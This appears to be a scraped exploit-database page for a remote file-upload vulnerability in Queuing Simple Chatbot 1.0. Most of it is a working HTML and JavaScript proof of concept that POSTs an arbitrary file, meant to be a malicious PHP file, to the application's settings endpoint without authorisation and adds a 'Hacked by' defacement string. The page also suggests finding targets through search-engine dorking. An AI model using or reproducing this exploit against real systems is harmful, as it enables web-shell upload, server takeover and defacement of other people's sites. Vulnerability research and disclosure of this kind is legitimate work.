BOOK THIS SPACE FOR AD
ARTICLE AD
## https://sploitus.com/exploit?id=PACKETSTORM:181448
=============================================================================================================================================
| # Title : Queuing Simple Chatbot 1.0 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/queuing.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML page is designed to remotely upload PHP malicious files directly.
[+] Line 33 set url of target.
[+] The path to upload the files : http://127.0.0.1/chatbot/uploads/
[+] Save Code as html :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Direct arbitrary File Upload</title>
</head>
<body>
<h2>Direct arbitrary File Upload</h2>
<form id="uploadForm">
<label for="fileInput">Select File:</label>
<input type="file" id="fileInput" name="fileInput" required><br><br>
<button type="button" onclick="uploadFile()">Upload File</button>
</form>
<script>
function uploadFile() {
const fileInput = document.getElementById('fileInput').files[0];
if (!fileInput) {
alert('Please select a file.');
return;
}
const formData = new FormData();
formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');
formData.append('img', fileInput);
console.log("(+) Uploading file...");
fetch('http://127.0.0.1/chatbot/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL
method: 'POST',
body: formData
})
.then(response => response.text())
.then(data => {
if (data === '1') {
console.log("(+) File upload seems to have been successful!");
} else {
console.log("(-) Oh no, the file upload seems to have failed!");
}
})
.catch(error => console.error("(-) Error during file upload:", error));
}
</script>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================